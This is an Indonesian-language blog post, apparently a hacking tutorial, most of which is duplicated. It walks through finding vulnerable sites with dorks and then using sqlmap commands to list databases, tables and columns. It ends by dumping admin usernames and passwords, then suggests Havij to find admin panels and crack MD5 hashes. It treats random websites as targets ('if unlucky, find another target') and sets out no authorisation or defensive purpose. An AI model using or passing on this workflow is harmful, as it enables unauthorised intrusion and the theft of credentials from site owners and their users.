1. Seperti biasa cari nilai Vuln nya dulu "Silahkan gunakan dork yang sudah tersedia "
2.buat yang belum punya program python monggo silahkan download download yang 2.3.7
3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "
4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c
cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini :
![[Image: TujuDirektoridenganCmd.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxZbB4-A4HGOW86TxICpThNDJ7IyP7kdujatTPF4cApzBNEvLp8gt8PNasdvwUWN1_rB1BH-iXx6_yP6wV36Ybsd2QcC4WI6M-gJlXVSpe6NWn4XZS04pbyCxSDrlm2ZeGFy5OEvl9F4/s640/TujuDirektoridenganCmd.png)
Mudahkan
...
5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
![[Image: MencariDbs.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVdECeHexAGDZYQTktms6qbIjNYMW9esMlz-cCKtWiNx65cSxbIja0V1JcJk_W2_VyrXOQ7BNuIRwwi8YMoSaKC9yP4TTySO2qBmOJYqw8lLo7MkG_F2aYidVvb6K-m41P4xhPY-u_c4/s640/MencariDbs.png)
6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :
![[Image: EksekusiUser.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv48bG-wKKv4pPOd7FfIBqcSmwjmrsHLys5wcpEjJsWJbPGeqclutxUaz7wdGhHXzJHGm9C3GWUtLoD297TW3HlYH6mCFUDtsIPQypKacw-W4RXZY_UFRBzoJ3RT4650h4CTipLd-sN8M/s1600/EksekusiUser.png)
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
![[Image: udah%2Bmenemukanuser%252Bpassadmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnW4wZ6DXHvqfuQzLPIHUOWHUZB7u51MqE4AaPmlCI9fUzPwF1SKe-JRb40mD2voxs8HZmSzMxHXNUnPDbO81qwqZ7GpKEkFPtcD71QOuUI3B55Q-yO49nn11aCkqyUID4ncssAFao71Y/s640/udah+menemukanuser%252Bpassadmin.png)
Ea kk , jangan berbahagia dulu soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya
8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama untuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :
![[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJb0Vae2dm-ZmOBaqsCnK9yFvA5KgMCmrMNyDF9cfgEz1tcCS1-vowT1DTzxuWhePlkOj4t5uhwKtKwXzbw8Fakmjqti9EfuN5e9OuNi2f1ycHHFxxBlQC5Oesir78oCbldmneeRzLiIc/s640/Berhasil+mendapatkan+username%252Bpassword+admin.png)
dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5 ^_^ ,masalah tersebut bisa di atasi pake havij "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" ..
__________________________________________________________________
Semoga Thread saya ini bermanfaat
2.buat yang belum punya program python monggo silahkan download download yang 2.3.7
3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "
4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c
cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini :
![[Image: TujuDirektoridenganCmd.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxZbB4-A4HGOW86TxICpThNDJ7IyP7kdujatTPF4cApzBNEvLp8gt8PNasdvwUWN1_rB1BH-iXx6_yP6wV36Ybsd2QcC4WI6M-gJlXVSpe6NWn4XZS04pbyCxSDrlm2ZeGFy5OEvl9F4/s640/TujuDirektoridenganCmd.png)
Mudahkan
... 5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
![[Image: MencariDbs.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVdECeHexAGDZYQTktms6qbIjNYMW9esMlz-cCKtWiNx65cSxbIja0V1JcJk_W2_VyrXOQ7BNuIRwwi8YMoSaKC9yP4TTySO2qBmOJYqw8lLo7MkG_F2aYidVvb6K-m41P4xhPY-u_c4/s640/MencariDbs.png)
6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :
![[Image: EksekusiUser.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv48bG-wKKv4pPOd7FfIBqcSmwjmrsHLys5wcpEjJsWJbPGeqclutxUaz7wdGhHXzJHGm9C3GWUtLoD297TW3HlYH6mCFUDtsIPQypKacw-W4RXZY_UFRBzoJ3RT4650h4CTipLd-sN8M/s1600/EksekusiUser.png)
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
![[Image: udah%2Bmenemukanuser%252Bpassadmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnW4wZ6DXHvqfuQzLPIHUOWHUZB7u51MqE4AaPmlCI9fUzPwF1SKe-JRb40mD2voxs8HZmSzMxHXNUnPDbO81qwqZ7GpKEkFPtcD71QOuUI3B55Q-yO49nn11aCkqyUID4ncssAFao71Y/s640/udah+menemukanuser%252Bpassadmin.png)
Ea kk , jangan berbahagia dulu soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya
8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama untuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :
![[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJb0Vae2dm-ZmOBaqsCnK9yFvA5KgMCmrMNyDF9cfgEz1tcCS1-vowT1DTzxuWhePlkOj4t5uhwKtKwXzbw8Fakmjqti9EfuN5e9OuNi2f1ycHHFxxBlQC5Oesir78oCbldmneeRzLiIc/s640/Berhasil+mendapatkan+username%252Bpassword+admin.png)
dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5 ^_^ ,masalah tersebut bisa di atasi pake havij "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" ..
__________________________________________________________________
Semoga Thread saya ini bermanfaat
Tidak ada komentar:
Posting Komentar